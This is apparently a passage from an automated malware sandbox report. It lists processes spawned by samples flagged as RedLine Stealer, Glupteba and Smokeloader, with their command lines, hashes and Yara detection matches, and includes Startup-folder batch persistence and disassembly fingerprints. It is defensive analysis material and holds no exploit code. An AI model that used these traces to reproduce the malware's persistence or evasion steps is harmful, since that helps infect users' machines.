                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000021.00000002.3298037878.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                            Start time:03:31:07
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                            Start time:03:31:07
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                            Start time:03:31:09
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000024.00000002.3385094968.0000000001171000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000024.00000002.3409633902.0000000003253000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000024.00000002.3263335917.0000000000843000.00000040.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000024.00000002.3409633902.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                                            Start time:03:31:13
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                                                            Start time:03:31:17
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:237'568 bytes
                                                                                                                                                                                                                                                            MD5 hash:ED7321DFC04F801D87AB2F3B4ABCB8FB
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                                                            Start time:03:31:17
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                            Imagebase:0xda0000
                                                                                                                                                                                                                                                            File size:61'440 bytes
                                                                                                                                                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                                                            Start time:03:31:17
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                                                                                                            Imagebase:0x7a0000
                                                                                                                                                                                                                                                            File size:18'944 bytes
                                                                                                                                                                                                                                                            MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                                            Start time:03:31:24
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://hentaitoonami.com/
                                                                                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                                            Start time:03:31:27
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2216,i,3713958764592762144,12864230647668828489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                                            Start time:03:31:28
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
                                                                                                                                                                                                                                                            Imagebase:0x7ff7e4260000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                                                            Start time:03:31:28
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                                                            Start time:03:31:38
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'828'864 bytes
                                                                                                                                                                                                                                                            MD5 hash:EEE5DDCFFBED16222CAC0A1B4E2E466E
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000002E.00000002.4470759393.0000000000401000.00000040.00000001.01000000.0000002B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 75%, ReversingLabs
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                                            Start time:03:31:41
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
                                                                                                                                                                                                                                                            Imagebase:0x7ff7e4260000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                                            Start time:03:31:43
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:173
                                                                                                                                                                                                                                                            Start time:03:33:50
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 0160261D Relevance: .5, Instructions: 479COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ffeeaa30e7dcb7e1d7b290b0bb6bf0e5408dacd55836ce58f092581b31e83eb7
                                                                                                                                                                                                                                                              • Instruction ID: 0db8051f7d7c2a4f60bdd0a5e4dc0121bbeadbf243fa9d0dda683659b7587adc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffeeaa30e7dcb7e1d7b290b0bb6bf0e5408dacd55836ce58f092581b31e83eb7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51F09C317043446FD706A768986096A7FBEFFCA6107054479E50DCB356DD198C0A97A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01600E58 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 6b9ddf0c221e49258ceda8a681ff97ad7b16ba8609f07e8a6c999cbca77222d2
                                                                                                                                                                                                                                                              • Instruction ID: 8a6c836b84a46b8b61f3eb873ec97d927b5c7d5fef147ff72d42329ab9eb8fed
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b9ddf0c221e49258ceda8a681ff97ad7b16ba8609f07e8a6c999cbca77222d2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98417470A002058FCB59DF68C554BAEBBF2EF88344F14856DE805AB395DB349D42CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01600E68 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ca7b26d0b55b6f7bcfca7e12a1f6bc9e98af2715c8794efbe811f3d728b96f95
                                                                                                                                                                                                                                                              • Instruction ID: bff5ae66bbbd4d00d6e636cca747c58a4de304e5b9f48116450a2921870993f6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca7b26d0b55b6f7bcfca7e12a1f6bc9e98af2715c8794efbe811f3d728b96f95
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D417370A002058FCB09EB68C554BAEBBF2EF88340F248469E805AB395DB759D42CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0160100D Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b6b8a9487980b3264c43ead0b3e73c0703a2cf4f5e8c57fad2c2a22f1a5e49e2
                                                                                                                                                                                                                                                              • Instruction ID: d0de6c3be53b2f5bec1aaba2a97c72e66bf7ea4019d5377eecfb4f7bf12ceea2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b8a9487980b3264c43ead0b3e73c0703a2cf4f5e8c57fad2c2a22f1a5e49e2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F217C307082858FCB0FD778C95065E7F63EFD2344B14445ED8859B2E6CB205D06C712
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01601CA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 5d4aaa5b07ade15ee718e201799d86778c0b2c05c7794b64f9c54fe799610456
                                                                                                                                                                                                                                                              • Instruction ID: fc489f3170cdf3c69eacb9c7dc0210aee14f5e0e8190b6e6a93d64158834df56
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d4aaa5b07ade15ee718e201799d86778c0b2c05c7794b64f9c54fe799610456
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 911102717453851FC307A778AC6496B7FE9EBC221031A40BFD045CB2A6EA688C06C761
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01600839 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 013d42d4bfbcfd6dacb8f8973f90eb2227dba55dbd015647d58d5ead825701b3
                                                                                                                                                                                                                                                              • Instruction ID: 572af857cf0d4fe501f8752dd9f8ddce2e9077b097462d282b6e3015232bb37c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 013d42d4bfbcfd6dacb8f8973f90eb2227dba55dbd015647d58d5ead825701b3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC119E70A40209CBCB59EF68C9557AF76B2BB88244F21056CE402E73A4DB714E028BD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01600848 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 83a2152a10e4571cf0f5885baa3c9c1b410849396148aed269145b27f1a8dc73
                                                                                                                                                                                                                                                              • Instruction ID: 1e705e00bcefd01f466abeb78139c4b9518bb3ec7445bc4c95fef7b8b895e141
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83a2152a10e4571cf0f5885baa3c9c1b410849396148aed269145b27f1a8dc73
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5117C70A40205CBDB19EB78C919BAF76B6BB88280F210568E002A73E4DF704E028BD5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01601CC8 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8853143c6e9151efb8f5bc56fb25f62586ca7a88cfbb00a37ba7ca29a4487419
                                                                                                                                                                                                                                                              • Instruction ID: a2550aa28428bd917ef02a68ff73af14a36cb3d785577c4abd004270013c1991
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8853143c6e9151efb8f5bc56fb25f62586ca7a88cfbb00a37ba7ca29a4487419
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1F04F7574030A6BC71ABB7AEC6492F7B9EEBC5690311413EE419CB399EE70DC058790
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01600F62 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cd3fa3350160f5b84c76542c9bd46b89562a9a1ebfb8e8cf4c63b5dd31695366
                                                                                                                                                                                                                                                              • Instruction ID: f0e36b0e00bd866ce9726ac278cf25f23745411f2d785c485ae8867dde900ee0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd3fa3350160f5b84c76542c9bd46b89562a9a1ebfb8e8cf4c63b5dd31695366
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6101F9707002158FC70AEB78D990AAEB7E3EFD4350B20842DD4169B3A5CF75AD06CB41
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01601BF0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 053a05870804af05c6b7bc28604ea22115aaf604fa1292fcb62a4f0d946a4850
                                                                                                                                                                                                                                                              • Instruction ID: 5c1d689eec02260cde41bad3b6941e55de55bf76e83153463181ef031ee825b8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 053a05870804af05c6b7bc28604ea22115aaf604fa1292fcb62a4f0d946a4850
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF0E9317443941FC746576CA8209FA3BB9DFC632470A00B7E409CB262DD184C0B87E2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01600D88 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 93a27f35fdf6cf6fc1db09f4758ee4767a2c5a5127455264331dbf30a6a3790d
                                                                                                                                                                                                                                                              • Instruction ID: ac5e2d9e94b04a65deb6cf79af7c6a2454117d4de9f86472cdd8c36ec5b1f3ec
